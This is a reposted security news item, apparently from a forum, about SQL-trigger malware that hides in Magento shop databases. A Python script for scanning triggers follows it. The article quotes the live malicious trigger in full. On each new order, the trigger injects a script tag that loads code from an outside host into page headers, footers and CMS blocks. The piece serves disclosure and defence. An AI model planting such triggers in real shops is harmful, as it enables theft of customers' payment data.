NickTheGreek

A new SQL malware Targets online shops running on Magento

Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that targets websites running the Magento eCommerce platform. The novelty is that this is the first malware that hides its code in the website's database and is completely written in SQL.

The malware is triggered every time a user places a new order; the "SQL trigger" is then executed before the Magento platform even assembles the web page.

The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution in the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database, searching for suspicious SQL triggers such as those containing admin, .js, script or < (HTML tags).

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once the malicious trigger is discovered, it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks start with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below is the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		value, 
		CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	) 
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', 
		content, 
		CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
	);
END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
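The post's detection advice (list the triggers, then look for ones containing admin, .js, script or an HTML tag) can be automated over the rows that MySQL exposes in information_schema.TRIGGERS. The following is an added example, not code from the article, the forum poster, or the Magento or n98-magerun projects. It assumes you have exported the trigger rows to dictionaries keyed by the real column names TRIGGER_NAME, EVENT_MANIPULATION, EVENT_OBJECT_TABLE, ACTION_TIMING and ACTION_STATEMENT; the sample rows and the domain cdn.example.invalid inside them are constructed for the demo. It goes slightly beyond the post by also flagging any trigger that rewrites Magento's configuration or CMS content tables, since a legitimate order trigger has no reason to touch them.

```python
import re

# Coarse indicators named in the post: admin, .js, script, and HTML tags.
SUSPICIOUS_PATTERNS = (
    (r"admin", "references 'admin'"),
    (r"\.js\b", "references a .js file"),
    (r"script", "contains 'script'"),
    (r"<[a-zA-Z/!]", "contains an HTML tag"),
)

# Tables that hold page markup/config; a trigger writing here is a red flag.
# (Assumption: standard Magento 1 table names.)
CONTENT_TABLES = ("core_config_data", "cms_block", "cms_page")


def scan_trigger(trigger):
    """Return a list of reasons a single information_schema.TRIGGERS row looks suspicious."""
    body = trigger["ACTION_STATEMENT"]
    reasons = [label for pat, label in SUSPICIOUS_PATTERNS
               if re.search(pat, body, re.IGNORECASE)]
    for table in CONTENT_TABLES:
        if re.search(rf"\bUPDATE\s+`?{table}`?", body, re.IGNORECASE):
            reasons.append(f"writes to {table}")
    return reasons


def scan_triggers(triggers):
    """Map each suspicious trigger name to its list of reasons; clean triggers are omitted."""
    findings = {}
    for trigger in triggers:
        reasons = scan_trigger(trigger)
        if reasons:
            findings[trigger["TRIGGER_NAME"]] = reasons
    return findings


def drop_statement(trigger_name):
    """Build the removal statement for a flagged trigger, backtick-quoting the identifier."""
    safe = trigger_name.replace("`", "``")
    return f"DROP TRIGGER IF EXISTS `{safe}`;"


# Constructed sample rows in the shape of information_schema.TRIGGERS.
SAMPLE_TRIGGERS = [
    {
        "TRIGGER_NAME": "after_insert_order",
        "EVENT_MANIPULATION": "INSERT",
        "EVENT_OBJECT_TABLE": "sales_flat_order",
        "ACTION_TIMING": "AFTER",
        "ACTION_STATEMENT": (
            "BEGIN UPDATE core_config_data SET value = IF(value LIKE "
            "'%<script src=\"https://cdn.example.invalid/x.js\"></script>%', value, "
            "CONCAT(value, ' <script src=\"https://cdn.example.invalid/x.js\"></script>')) "
            "WHERE path='design/head/includes'; END"
        ),
    },
    {
        # A benign audit trigger: only writes to its own log table.
        "TRIGGER_NAME": "stock_audit",
        "EVENT_MANIPULATION": "UPDATE",
        "EVENT_OBJECT_TABLE": "cataloginventory_stock_item",
        "ACTION_TIMING": "AFTER",
        "ACTION_STATEMENT": (
            "BEGIN INSERT INTO stock_audit (product_id, qty, changed_at) "
            "VALUES (NEW.product_id, NEW.qty, NOW()); END"
        ),
    },
]

if __name__ == "__main__":
    for name, reasons in scan_triggers(SAMPLE_TRIGGERS).items():
        print(f"{name}: {', '.join(reasons)}")
        print("  remediation:", drop_statement(name))
```

The substring indicators are deliberately crude, so expect hits on innocent words such as "description" matching "script"; treat the output as a review queue, not a verdict, and read each flagged ACTION_STATEMENT before dropping anything. Because the trigger re-inserts itself on every order, also clean the affected core_config_data and cms_block rows, or the injected markup will remain even after the trigger is gone.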
